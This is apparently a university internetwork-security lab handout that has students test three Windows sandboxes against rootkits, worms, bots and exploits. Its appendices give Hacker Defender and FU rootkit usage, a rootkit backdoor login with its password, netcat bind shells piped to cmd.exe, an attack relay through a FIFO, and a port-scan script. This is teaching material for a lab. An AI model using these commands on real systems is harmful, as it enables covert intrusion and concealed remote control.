
ECE 4112 Internetwork Security
Lab X: Sandboxing

Group Number: _______________

Member Names: _________________________ _________________________

Date Assigned:
Date Due:
Last Edited:
Lab Authored By: Gary Kao & Jimmy Vuong, Fall 2007

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE the Date Due.

Goal: This lab will introduce the concept of sandboxing, which is a way to run a program isolated from the main host system. You will be investigating what a sandbox protects you from and how not all sandboxes are created equal.

Summary: In this lab you will be running three sandbox programs: Sandboxie, Virtual Sandbox, and ShadowSurfer. All three are available online for free, with limitations. We will use programs from previous labs such as Hacker Defender, FU, the AnnaKournikova worm, and the dcom buffer overflow exploit. We are also going to investigate properties of a sandbox, such as whether a sandboxed program can interfere with processes outside of the sandbox.

Background and Theory: Sandboxes are a form of virtualization, loosely comparable to VMware but much lighter. A sandbox is supposed to behave like the host as closely as possible while leaving the host unchanged, which makes it a simple way to safely run untested or untrusted code. Generally, a sandbox is a transparent layer that sits on top of the host machine: once a program runs inside the sandbox, anything that would change the host machine actually changes only that transparent layer. The layer can be discarded by restarting your computer or by cleaning the sandbox, depending on the program. Some security groups firmly believe in sandboxes as the ultimate form of security, since the host's filesystem is not changed and everything reverts to how it was before the sandbox was used. In this lab we will examine three different sandbox programs: Sandboxie, ShadowSurfer, and Virtual Sandbox.


Sandboxie extends the operating system (OS) with sandboxing capabilities by blending into it. Applications never access hardware such as disk storage directly; they have to ask the OS to do it for them. Because Sandboxie integrates into the OS at that level, a sandboxed program cannot bypass it simply by going around the OS. The following classes of system objects are supervised by Sandboxie: files, disk devices, registry keys, process and thread objects, driver objects, and the objects used for inter-process communication: named pipes and mailbox objects, events, mutexes (mutants in NT speak), semaphores, sections and LPC ports. Sandboxie also takes measures to prevent programs executing inside the sandbox from hijacking non-sandboxed programs and using them as a vehicle to operate outside the sandbox.

ShadowSurfer captures a snapshot of your volume(s) and runs an exact duplicate in a virtual PC or server state. This virtual state, called ShadowMode, allows the user to use the PC or server as normal, but without permanently writing system changes to the hard drive. If system, folder or file changes occur during a ShadowMode session, they can be committed to the PC or server automatically or manually. If malicious or unwanted changes occur during a ShadowMode session, they can be discarded with a simple reboot.

Virtual Sandbox is a secure software system designed to allow unknown or untrusted programs to be run in an isolated environment without access to personal files, local networks, and system settings. With Virtual Sandbox installed, programs can be allowed to run in a discardable, carefully tailored, virtual environment that is contained and isolated from the operating system, but appears on your Windows desktop.

Lab Scenario: We will be using three identical Windows virtual machines. Take one of your virtual machines and copy it twice.

First, go to your VMware folder, which is /home/vmware. Now find your Windows XP install folder, which should be called winXPPro, and copy it twice with two different folder names that you will remember. One VM will be used for each sandbox program (Sandboxie, Virtual Sandbox, and ShadowSurfer). For example, you can do

# cp -r winXPPro Sandboxie

This will create a new winXPPro instance in the folder called Sandboxie. Do this one more time to make the 3rd Windows image.

Next, we will grab the following files from the corresponding labs. You will need to remember how to use them, so we've included the relevant sections of each lab as appendices:

Lab 5: HackerDefender (Appendix A), FU (Appendix B), netcat (Appendix C), VNC (Appendix D), IceSword
Lab 6: dcom exploit (Appendix E)
Lab 8: AnnaKournikova (Appendix F)
Lab 10: SDBot (Appendix G)


Note that these appendices are only used to remember how to run the programs.

Links to the three sandbox programs are found in the sources section.

Section 1: Installing the Sandboxes and Testing

Installing the sandboxes is relatively easy. Simply run the installer executable for the corresponding sandbox on each machine; for example, sandboxie.exe installs Sandboxie. On the 1st Windows VM, install Sandboxie. On the 2nd Windows VM, install Virtual Sandbox. On the 3rd Windows VM, install ShadowSurfer. After each install, restart the VM. When we say "go to Sandboxie", that means load up the 1st Windows VM; Virtual Sandbox means the 2nd VM, and so on.

The Sandboxie install is easy and straightforward. The Virtual Sandbox installer offers to scan your computer for files; do not let it scan, simply click Cancel. ShadowSurfer asks for a restart; allow it to do so.

Q1.1: You should notice that each VM has something new when it starts up. What did you notice about each sandbox after the restart?

First we will do the most basic sandbox test – seeing how transparent the sandbox is.

1. First, open Sandboxie by double-clicking the new icon in the system tray. Now right-click on the "Default Sandbox", click "Run Application" and choose "Any Application". Type "explorer" and press Enter. Go to the desktop and create a new file with a name you will remember. Now, do you see this file on your desktop?

Q1.2: Do you see the file on your desktop?

2. In Virtual Sandbox, create a text file on the desktop.

3. In ShadowSurfer, create a text file on the desktop.

Also, for each VM, load up IE (in the Sandboxie VM, launch it via the Sandboxie console) and FTP to the host computer: if your host is a.b.c.d, type ftp://a.b.c.d and log in. Grab a file and put it on your desktop.

Screenshot #1-3: Take a screenshot in each VM showing the IE window with the copied file name highlighted and the file on the desktop in the same screenshot.

Restart all 3 computers. Once you’re booted back up, see if you can find the files on the desktop.

Q1.3: For each VM, do you see the file on your desktop?

Q1.4: Upon bootup, for each of the computers, is the FTP’d file still there?


Now we will try to load a program and see how it affects the sandbox. This test matters because malware inside the sandbox can try exactly the same thing: find the sandbox's own process and terminate it.

1. First, open Sandboxie by double-clicking the new icon in the system tray. Right-click on the "Default Sandbox", click "Run Application" and choose "Any Application". Type "taskmgr" and press Enter. This should load up a sandboxed Task Manager (Sandboxie marks a sandboxed window with # marks around its title). Now try to end the sandboxie.exe process. The screenshot below shows the same procedure used to launch IE.

2. Now, in the Virtual Sandbox VM, press ALT+CTRL+DEL to bring up Task Manager. Virtual Sandbox intercepts program launches system-wide and asks through a dialog box, so there is no console to use like Sandboxie's. VS *might* ask you whether Task Manager should run in a sandbox; if so, click the "Launch in Default Sandbox" option (option 2). See the screenshot below for an example that uses ping. For this entire lab, you will use the "Launch in Default Sandbox" option.


In Task Manager, try to end frst.exe, which is the Virtual Sandbox process.

3. In ShadowSurfer, everything is sandboxed no matter what you do; you have to disable it and restart to get your computer unsandboxed (but don't do this). So press ALT+CTRL+DEL and try to end the ShadowSurfer process, which is called ShadowProtectSvc.exe.

Q1.5: What happens with each of the three sandboxes when you try to close the sandbox?

Now for each of these computers create a file on the desktop that you remember. Next, restart the computers.

Q1.6: Upon bootup, for each of the computers, is the text file still there?

This is one major feature of a good sandbox: a sandboxed program must not be able to interfere with the sandbox itself. Malware can be written that detects a sandbox and tries to kill it exactly like this. Passing this test means an attacker cannot shut the sandbox down that easily. These tests only exercise basic sandbox functionality.


Section 2: Susceptibility to Remote Attacks and Local Attacks

Does a sandbox protect you from crashes? Sandboxes are supposed to mimic an actual host computer, so there is no reason to expect them to prevent a crash: the program inside the sandbox runs the same vulnerable code. We will investigate this.

Q2.1: Since a sandbox is supposed to mimic an actual host, should it allow crashes if the host would crash?

This is a common question that is asked. Should a sandbox improve the security of the host, or simply completely mimic the host and have the same vulnerabilities as the host?

First we will test a client-side vulnerability, the JpegOfDeath exploit, which triggers a flaw in the Windows GDI+ JPEG parser when a crafted image is viewed. Since our VMs are unpatched Windows XP machines, they are vulnerable.

Grab the file exploit-test.exe from the NAS on each VM. Run this program and click Yes through all the dialogs until an Explorer window opens. In this window, double-click the image that is presented to you. Everything is run identically on all three VMs.

Note that in Sandboxie, run all programs via the Sandboxie console, so in this case load exploit-test.exe from the console.

Q2.2: For each of the VMs, did you crash?

Windows itself should still be intact after the crash.

Next, load up the dcom exploit from Lab 6 on the host computer (it is also in Appendix E). Get the IP address of each VM and run the dcom exploit against it, choosing the same target option as in the appendix.

Q2.3: For each of the VMs, did you crash?

In general, a sandbox offers no added protection against exploitation: it is simply a method of virtualization that tries to behave like the host without directly affecting the host. A remote exploit such as dcom reaches the same vulnerable service whether or not a sandbox is installed; what the sandbox changes is whether the attacker's changes survive a reboot or a cleaning, which Sections 3 and 4 examine.

Section 3: Susceptibility to Rootkits, Backdoors, Worms, Botnets


We’ve encountered a variety of nasties from previous labs. So now we will go through some of them to see how much protection a sandbox offers, such as rootkits (HackerDefender and FU), backdoors (netcat and VNC), worms (AnnaKournikova), and botnets (SDBot).

The first tool we will examine is netcat. Consult Appendix C for information on how to install netcat and set up a backdoor listener. Do so on each of the three simulated WinXP machines, then connect to the listener from the host.

Q3.1: For each of the VMs, did netcat bypass the security?

For the VMs in which netcat did manage to give you a shell, load up IceSword and see whether you can find the netcat listener process.

Q3.2: Can you find the netcat listener in IceSword?

The next tool we will examine is Hacker Defender. Consult Appendix A for information on how to install and set up Hacker Defender. Make sure to do so for each of the simulated WinXP machines.

Q3.3: For each of the VMs, did Hacker Defender bypass the security?

Next comes VNC. Load up VNC (as shown in Appendix D) on all three computers, doing what is necessary on each to ensure that the program runs in sandbox mode. Next, attempt to connect to it from your Red Hat Linux host computer.

Q3.4: For each of the VMs, did VNC bypass the sandbox security?

Q3.5: For the ones in which VNC did not manage to connect, what happened?

Load up FU next (consult Appendix B for more information) on all three WinXP.

Q3.6: For each of the VMs, did FU bypass the sandbox security?

For the VMs in which FU did load, choose a process to hide. After doing so, open IceSword again and try to find the process that was hidden.

Q3.7: Can you find the process in ice sword?

Now we will work with the AnnaKournikova worm from Lab 8. Look to Appendix F for how to run it on each VM. Press ALT+CTRL+DEL and end wscript.exe.

Q3.8: For each of the VMs, did all of them load the worm correctly? Why or why not?

On each VM, run the registry editor with the command "regedit". In Sandboxie, you'll need to run this through the console, as usual. Go to the registry entry that the worm created (HKCU\Software\OnTheFly).


Screenshot #4-6: Take a screenshot showing this registry entry

Additionally, in Sandboxie, go to Start > run and type in regedit. Press enter. Now, try to goto the OnTheFly registry entry.

Q3.9: Is this registry key there? Why or why not?

Next we will load up SDBot on each VM, one by one. See Appendix G for instructions on how to create the SDBot. Also remember to load up the IRC server on the Red Hat host computer, as we did in Lab 10, with the command:

# /usr/local/sbin/ircd -s

Load the bots up one by one because SDBot chooses a random name, so you won’t know which VM loaded which SDBot.

Q3.10: Did SDBot load up successfully on each VM? If not, why?

Section 4: Clearing the Sandbox

After everything we installed in Section 3, how clean are the sandboxes?


In the screenshot above, the right-hand regedit instance was run via Sandboxie, while the left instance is the normal regedit. The sandboxed instance has the OnTheFly registry entry; the normal one does not. Sandboxie does indeed make a transparent layer on top of Windows. If you check for the Hacker Defender or SDBot registry entries, you will notice the same thing.

Each of the 3 VMs has been infected in some way or another, so now we can see whether each sandbox does what it is meant to do: erase all traces of what was done inside it. To do this, restart all the VMs. You can also manually clear the sandboxes, but restarting is far easier.

Q4.1: After the restart, did you notice any of the programs we used in section 3 load up? If so, what programs are active?

Screenshot # 7-9: Take a screenshot of the OnTheFly registry key, or where it would be

Q4.2: What sandbox do you prefer? Why?


Section 5: Defenses Along With the Sandbox

Sandboxes are vulnerable to the same things the main machine is vulnerable to. In this lab we found that a sandbox alone is not a strong defense, because its goal is to emulate the Windows machine rather than to prevent malware from getting onto your computer in the first place.

Running programs sandboxed is safer because any files the program stores will be removed when the sandbox is cleared, so no permanent damage is done to the host. This is ideal for a browser that may download malware, for example, since all you need to do is clear the sandbox. The main weakness is that the malware still executes normally while the sandbox is active: whatever it does over the network during the session (the netcat and VNC backdoors and the SDBot of Section 3) is not undone by clearing the sandbox afterwards. Used in conjunction with anti-malware, anti-virus, and a firewall, a sandbox greatly decreases the chance of any permanent infection. We have already investigated anti-viruses and firewalls in previous labs; the threats that got past those defenses had to save files on your computer. Since sandboxes don't allow permanent storage, these threats are not nearly as dangerous as they would be without a sandbox.

For users who already have an anti-virus and a firewall, a sandbox adds an extra layer of protection: if anything gets past the anti-virus and firewall, its changes do not persist. The biggest reason sandbox use is growing now is the threat of botnets. Since some bot programs are not detected by anti-virus products or firewalls, a sandbox is a way to contain what cannot be detected. However, more sophisticated bots are able to detect sandboxes, and as time passes they may be able to get past them.


Appendix A: Hacker Defender (excerpt from lab 5)

Section 4: Hacker Defender
http://hxdef.org/

First, make a copy of your winXPPro virtual machine by opening a terminal in you Linux WS 4.0 physical machine and typing:

# cp -r winXPPro winXPPro.bak (assuming winXPPro is the name of your folder)

Now start your Windows XP Virtual Machine. The remainder of this section of the lab will be done on this machine.

This rootkit rewrites memory segments in all running processes to change their behavior. It has been available for about a year and would be detected by almost any antivirus program. For more on the program and its usage than what is in this lab, see the readme file (readmeen.txt) or go to the website.

Copy all the Lab5/Windows folder files from the NAS to a new folder on your Desktop named “hacker”.

This rootkit is run by typing the executable, hxdef100.exe, and specifying a .ini file to use. The .ini file has information on what files, processes or ports to hide, as well as information on the backdoor it creates on the system. We will be using kitfile.ini for this lab; you can double-click on it and it will open in Notepad. There are 9 headings required, though we will only be looking at a few in this lab. The first heading, [Hidden Table], is the list that tells the program what files, directories and processes to hide. Right now it has root* and rcmd.exe as the only entries. This means that it will hide any file, folder or process whose name starts with root, and the rcmd.exe process. The next heading, [Root Processes], is a list of programs that will be "immune" to the infection, meaning they will still be able to see hidden files and processes. [Hidden Services] is a list of services that will be hidden from the database of installed programs. [Settings], the last heading, holds information on the backdoors as well as on how things are run; we will not be modifying this part at all, but make note of the Password. For more information on what all these do, again, see the readme file.

Create a folder on your desktop called "roottest". Go to Start > Run and type cmd.

cd to the "hacker" folder with the rootkit files. Type:

hxdef100.exe kitfile.ini

You have just installed and run the rootkit. On your desktop, right-click and choose Refresh.

Q4.1: Can you still see the folder you just created?

Now hold ALT + CTRL + DELETE and click on the processes tab to see what is running.


Q4.2: How do we know that Hacker Defender is running on our machine?

Now it is time to hide the Hacker Defender process. Open up kitfile.ini and add the following line under [Hidden Table]:

hxdef*

Save the file. Kill the existing hxdef process and rerun hxdef100.exe kitfile.ini.

Q4.3: Again look at what processes you are “running,” are you still able see that Hacker Defender is running?

You can do this with any process, i.e. IE (Internet Explorer) but you would need to be careful hiding some system process that would stop your computer from functioning properly. Just for fun I added * to [Hidden Table] and hid all files and processes, of course, I was not able to run anything after that and could not even stop Hacker Defender from running, luckily I had backed up my Virtual Machine image and did not lose everything.

Now we will use the backdoor feature of the rootkit. Once the rootkit is installed, all TCP ports become potential backdoors. This includes port 80, used for web servers. One of the web servers on the network has been infected with this kit, using a .ini file similar to yours, so the backdoor has the same settings. The server is http://57.35.5.16, which is the StorageRus Webserver. You can see the home page by typing the IP address into a web browser. The file bdcli100.exe will let us remotely connect to this server, through port 80, with administrator privileges. Again in your cmd window, type:

bdcli100.exe 57.35.5.16 80 hxdef-rulez

This is the host, port and password to use when connecting. Because we have hidden Hacker Defender processes and rcmd.exe, there is no simple way of seeing that we have connected. Also, it was shown in tests that IIS does not log any of this connection.

Once you have logged on through the backdoor, you might as well have some fun. In C:\Inetpub\wwwroot is a file called default.htm. This is the homepage for the web server. You can edit a file by typing:

# edit <filename>

Do this with default.htm and add your group number, names and a brief message in the body so it shows up on the homepage. Pressing ALT brings you to the menu options at the top of the screen; save your file and exit. Now type:

# exit

You have just terminated your backdoor connection. On your own machine type:

# net stop HackerDefender100

Make sure the hidden files are revealed. This ends this portion of the lab. Again, if something was lost or damaged, you can delete this Virtual Machine folder and use the backup you made at the beginning of this section with:


# rm -rf winXPPro
# mv winXPPro.bak winXPPro


Appendix B: FU (excerpt from lab 5)

FU - A rootkit that hides from RootkitRevealer

FU [https://www.rootkit.com/vault/fuzen_op/FU_Rootkit.zip] is a new breed of rootkits that uses advanced hiding techniques to evade detection.

The FU rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that forensics is impossible, and even hide device drivers. It does all this by Direct Kernel Object Manipulation™ – no hooking! This project has been evolving over time. It was originally conceived as a proof-of-concept. FU is a play on words from the UNIX program "su" used to elevate privilege.

Installing FU: Get FU_Rootkit.zip from the NAS, copy it to your XP VM, and extract the directory.

Using this rootkit to hide a process

To use this rootkit to hide a process, extract the rootkit.

In the command window, browse to the EXE folder and type fu -pl 100. This will list all the running processes.

C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -pl 100
Process: fu.exe:1964
Process:     :2153006656
Process: System:4
Process: smss.exe:364
Process: csrss.exe:512
Process: services.exe:588
Process: lsass.exe:600
Process: svchost.exe:1088
Process: explorer.exe:1368
Process: spoolsv.exe:1440
Process: VMwareTray.exe:1528
Process: VMwareUser.exe:1536
Process: pbagent.exe:1544
Process: msmsgs.exe:1552
Process: pbhubsrv.exe:1744
Process: VMwareService.e:1824
Process: wuauclt.exe:720
Process: cmd.exe:1572
Process: taskmgr.exe:1196
Process: RddootkitReveal:892
Process: RDOCUQWQJDXPGBA:1448
Total number of processes = 21

Now, select any process and note its PID [we selected RDOCUQWQJDXPGBA : 1448].

Type fu -ph 1448 (or whatever PID you chose):

C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -ph 1448

C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -pl 100
Process: fu.exe:124
Process:     :2153006656
Process: System:4
Process: smss.exe:364
Process: csrss.exe:512
Process: services.exe:588
Process: lsass.exe:600
Process: svchost.exe:1088
Process: explorer.exe:1368
Process: spoolsv.exe:1440
Process: VMwareTray.exe:1528
Process: VMwareUser.exe:1536
Process: pbagent.exe:1544
Process: msmsgs.exe:1552
Process: pbhubsrv.exe:1744
Process: VMwareService.e:1824
Process: wuauclt.exe:720
Process: cmd.exe:1572
Process: taskmgr.exe:1196
Process: RddootkitReveal:892
Total number of processes = 20

Q6.3: Take screenshots of the process list before and after you hide a process. (Screenshot P1 #3, #4)

Q6.4: Does Rootkit Revealer detect the presence of this rootkit ?
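Appendices A and B describe two different ways of hiding a process: Hacker Defender filters the results of the enumeration APIs according to [Hidden Table] (except for processes listed under [Root Processes]), while FU unlinks the process from the kernel's active-process list and leaves its threads running. The Python below is added here as an illustration; it is not code from the lab or from either rootkit, and it touches no real kernel. It simulates both techniques on a constructed process table and then applies the cross-view comparison that detectors such as IceSword rely on: whatever a second, lower-level view contains that the normal listing lacks has been hidden. The PIDs follow the fu -pl output above; the hxdef entries (PIDs 2000 and 2004), the contents of [Root Processes] and the exact glob semantics of the hidden table are assumptions.

```python
"""Process hiding (hxdef name filtering, FU DKOM unlink) and cross-view detection,
simulated in user space.  Added example, not part of the lab or of either rootkit."""
from fnmatch import fnmatchcase

# Constructed process table.  PIDs/names follow the fu -pl output in Appendix B;
# the hxdef entries (2000, 2004) are assumed for this example.
PROCS = {
    4: "System", 364: "smss.exe", 512: "csrss.exe", 588: "services.exe",
    600: "lsass.exe", 1088: "svchost.exe", 1368: "explorer.exe",
    1572: "cmd.exe", 1196: "taskmgr.exe", 892: "RootkitRevealer.exe",
    1448: "RDOCUQWQJDXPGBA", 1964: "fu.exe",
    2000: "hxdef100.exe", 2004: "rcmd.exe",
}

# kitfile.ini [Hidden Table] after the Q4.3 change, and an assumed [Root Processes].
HIDDEN_TABLE = ["root*", "rcmd.exe", "hxdef*"]
ROOT_PROCESSES = ["hxdef*", "rcmd.exe"]


def hxdef_matches(name, patterns):
    """Case-insensitive glob match: the semantics the lab describes for root*."""
    return any(fnmatchcase(name.lower(), p.lower()) for p in patterns)


def hxdef_view(viewer, procs, hidden=HIDDEN_TABLE, roots=ROOT_PROCESSES):
    """The process list as `viewer` sees it once hxdef's API hooks are active."""
    if hxdef_matches(viewer, roots):
        return dict(procs)                      # root processes are immune
    return {pid: n for pid, n in procs.items() if not hxdef_matches(n, hidden)}


class Eprocess:
    """Only the fields DKOM cares about: the ActiveProcessLinks pair."""
    __slots__ = ("pid", "name", "flink", "blink")

    def __init__(self, pid, name):
        self.pid, self.name = pid, name
        self.flink = self.blink = self


def build_active_list(procs):
    """Circular doubly-linked list headed by a PsActiveProcessHead sentinel."""
    head = Eprocess(None, "PsActiveProcessHead")
    for pid, name in procs.items():
        node = Eprocess(pid, name)
        node.blink, node.flink = head.blink, head   # append just before the head
        head.blink.flink = node
        head.blink = node
    return head


def walk_active_list(head):
    """The walk NtQuerySystemInformation (hence Task Manager) relies on."""
    out, node = {}, head.flink
    while node is not head:
        out[node.pid] = node.name
        node = node.flink
    return out


def fu_ph(head, pid):
    """`fu -ph pid`: unlink one entry so the walk skips it.  The entry is made to
    point at itself so that process exit does not touch its former neighbours."""
    node = head.flink
    while node is not head:
        if node.pid == pid:
            node.blink.flink = node.flink
            node.flink.blink = node.blink
            node.flink = node.blink = node
            return True
        node = node.flink
    return False


def cross_view_diff(api_view, ground_truth):
    """Cross-view detection: present in the low-level view, absent from the API view."""
    return {pid: n for pid, n in ground_truth.items() if pid not in api_view}


def demo():
    """Run both hiding techniques and the detection; return the findings."""
    head = build_active_list(PROCS)
    assert fu_ph(head, 1448)                   # the PID hidden in Appendix B
    return {
        "hidden_from_taskmgr": cross_view_diff(hxdef_view("taskmgr.exe", PROCS), PROCS),
        "hidden_from_rcmd": cross_view_diff(hxdef_view("rcmd.exe", PROCS), PROCS),
        "fu_visible_count": len(walk_active_list(head)),
        "fu_hidden": cross_view_diff(walk_active_list(head), PROCS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two things the simulation makes visible that the lab text only implies: the shipped root* pattern also hides RootkitRevealer.exe from every non-root process, since a prefix wildcard over-matches, so a Task Manager listing (Q4.2, Q4.3) cannot be trusted once the hooks are in; and after fu -ph the unlinked process is absent from the list walk yet still present in the ground-truth table, which is exactly the discrepancy IceSword reports in Q3.7.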


Appendix C: Netcat (excerpt from lab 5)

Section 9. Installing and Using Netcat

Note: Netcat for Linux may be obtained from the web at http://www.atstake.com/research/tools/network_utilities/

Installing Netcat on the Windows machine

Start your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2).

Installing Netcat on the Linux WS4 machine

You should already have a file called netcat.tar.gz in your /home/tools directory. If you don't, get it from /mnt/nas4112/Tools/Linux/tools, after mounting the NAS server. Go into your /home/tools directory and execute the following commands:

# tar xvfz netcat.tar.gz
# cd netcat
# make linux
# cp nc /usr/local/sbin

The last command will allow you to run Netcat without having to specify this directory.

Using Netcat

The executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use

# nc [IP address to send to] [port to send to]

(e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)

All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use

# nc [IP address to send to] [port to send to] < [file to read from]

(e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)

To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are:

-l  specifies that Netcat is running in listening mode
-p  specifies which port Netcat should listen on
-v  verbose mode so that all results are displayed
-w  maximum amount of time (in seconds) to wait for a connection or for a response
-z  zero-I/O mode: Netcat only attempts the connection (a SYN packet) and reports whether it got a response, sending no data
-e  allows Netcat to execute a program whose input and output are connected to the network traffic

Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme.

To run Netcat in listen mode, use the -l and -p options. The command syntax would be:

# nc -l -p [port to listen to]

If you want to store the input that is received, you can pipe all the received data to a file, using the following command:

# nc -l -p [port to listen to] > [file to write to] (for Windows no spaces around >)

(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to testfile.txt)

NOTE: If you redirect everything to a file, whatever was previously in that file will be overwritten.

Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this):

# echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan]

(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the system with IP address a.b.c.d)
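The scan above is a plain TCP connect scan: for every port in the range Netcat tries to complete the three-way handshake and reports what happened within the -w timeout. The following Python is an added example, not part of the lab, that performs the same scan with the three outcomes nc -v distinguishes made explicit: open (handshake completed), closed (the host answered with a RST, seen as "connection refused") and filtered (nothing came back before the timeout). The loopback listener helpers exist only so it can be exercised without a second machine; the port-range syntax assumed is nc's "lo-hi".

```python
"""TCP connect scan in the style of `echo QUIT | nc -v -w 3 -z host 1-200`.
Added example, not part of the lab."""
import socket
from contextlib import closing


def probe(host, port, timeout=3.0):
    """One -z probe: complete (or fail) the handshake and send nothing.
    open     = handshake completed
    closed   = RST came back (connection refused)
    filtered = no answer before the -w timeout, or host unreachable"""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)          # nc -w <seconds>
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"
        except OSError:                # e.g. no route to host
            return "filtered"
        return "open"


def scan(host, ports, timeout=3.0):
    """Probe each port in turn, as nc does for a lo-hi range."""
    return {p: probe(host, p, timeout) for p in ports}


def open_ports(results):
    """The ports nc -v would report as open."""
    return sorted(p for p, state in results.items() if state == "open")


def port_range(spec):
    """Parse nc's 'lo-hi' (or a single 'n') port spec into a range."""
    lo, _, hi = spec.partition("-")
    return range(int(lo), int(hi or lo) + 1)


# Loopback fixtures so the scan has targets with a known state.
def local_listener():
    """A listening socket on an ephemeral loopback port (will scan as open)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free one
    s.listen(5)
    return s


def local_closed_port():
    """Bind, read the port number, close: nothing listens there afterwards."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    with closing(local_listener()) as lst:
        p = lst.getsockname()[1]
        print(scan("127.0.0.1", port_range(f"{p - 1}-{p + 1}"), timeout=1.0))
```

Against the Windows VMs in this lab, a port that nc reports as refused tells you the host is up and nothing listens there, while a timeout (filtered) usually means a firewall dropped the SYN; that distinction is why -v matters and why a short -w keeps a 1-200 scan from taking minutes.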

Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command (from the nc11nt directory):

# nc -l -p [port to listen to] -e cmd.exe

(e.g. nc -l -p 7777 -e cmd.exe - This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands.)

On the client side, simply type

# nc [listening machine] [port to connect to]

(e.g. nc a.b.c.d 7777)

and start typing in your commands.

A fourth popular use of Netcat is to create relays, whereby an attacker bounces through several intermediate systems while actually attacking a target system. Tracing where the attack originated from then becomes a very painful and sometimes impossible process.

Exercise 9.1: Netcat File Transfer

Use Netcat to transfer the password file from your Linux to your Windows machine. Store the data you receive in passwd.txt. Now try transferring a binary file (e.g. an .rtf file) from the Windows system to the Linux system and then transfer it back to the Windows system, saving it under a different filename.

Q9.1.1. Is the binary file the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth.

Q9.1.2. What can you say about Netcat’s ability to transfer binary files?

Exercise 9.2: Netcat Backdoors

This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener on your Windows machine. Use the options to pipe the output to cmd.exe shell. Select any port number to listen to and connect to this backdoor by running Netcat in client mode on your Linux machine. Now type in some simple DOS commands like dir and mkdir. Then try running some complex commands and examine the extent of information that you can gain from the system.

Q9.1.3. What do you conclude from this?

Exercise 9.3: Netcat Relays

Note: This exercise requires the use of both Windows machines.

In this exercise you will create a relay on your Linux machine using the Netcat listener and client. This relay will forward data from one Windows machine to the other. The Netcat client will be running on the first XP machine while the listener will be running on the second XP machine. Once established, the relay should allow you to access the second XP machine from the original XP machine.

First create a backdoor shell on the new XP machine, using the Netcat listener (cd into the folder where netcat is located):

# nc -l -p <listening port> -e cmd.exe

(e.g. nc -l -p 56789 -e cmd.exe)

Creating a relayA way to create a relay is to tie the input and output of a Netcat listener and client together using a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out mode. You can create a FIFO and use it to link a Netcat listener to client by typing the following in Linux:

# mknod backpipe p
# nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe

portA – Port on which the relay is listening
portB – Port on the target machine on which the backdoor shell is listening
target computer – The target XP machine (XP Machine 2). Make sure its IP is different from your other XP machine.

Note: Do not put spaces between the file descriptor number and the '<' or '>' signs. 0<backpipe and 1>backpipe redirect standard input and standard output, respectively, into backpipe; with a space in between, the shell would pass the digit to nc as an argument and redirect the wrong stream.

e.g. nc -l -p 12345 0<backpipe | nc e.f.g.h 56789 1>backpipe

The line above creates a relay listening on TCP port 12345 and forwards the data to TCP port 56789 of the machine on which the backdoor shell was created.

For this relay to work, you have to allow packets into the listening port on your linux machine. If the default Linux firewall iptables is running, it won’t allow these packets. So disable it by typing

# /etc/init.d/iptables stop

After creating the relay and listener, connect to the relay by typing

# nc [relay machine] [portA]

on the original XP machine.

Now try some other commands on the target machine and see what all you can do.

Run the command called ipconfig in the shell. This will show you the ip address of the target machine. Open up another cmd.exe window on your client machine and do ipconfig again to see the ip address of the machine you’re connecting from. Position these windows so that both the ip addresses are visible.

Take a screenshot of these windows and submit it with your report. You can use the “Print Screen” key to capture the screen and then paste it into the paint application.

(Screenshot P2#1)

Hint: In this exercise, you used Netcat the following four times:

1. As a listener in the relay on your Linux machine

2. As a client in the relay on your Linux machine

3. As a listener, running the shell on the second XP machine

4. As a client on the first XP machine, where commands can be typed to be sent to the relay.

Q9.1.4. Draw a diagram explaining how the relay works and the directions of data flow.

Exercise 9.4: Other uses of Netcat

Q9.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail).

Q9.1.6. What defenses could you use against an attack like a netcat backdoor?

Appendix D: VNC (excerpt from lab 5)

Section 11. Installing and Using Virtual Network Connection (VNC)

You can obtain VNC from the web at http://www.realvnc.com/

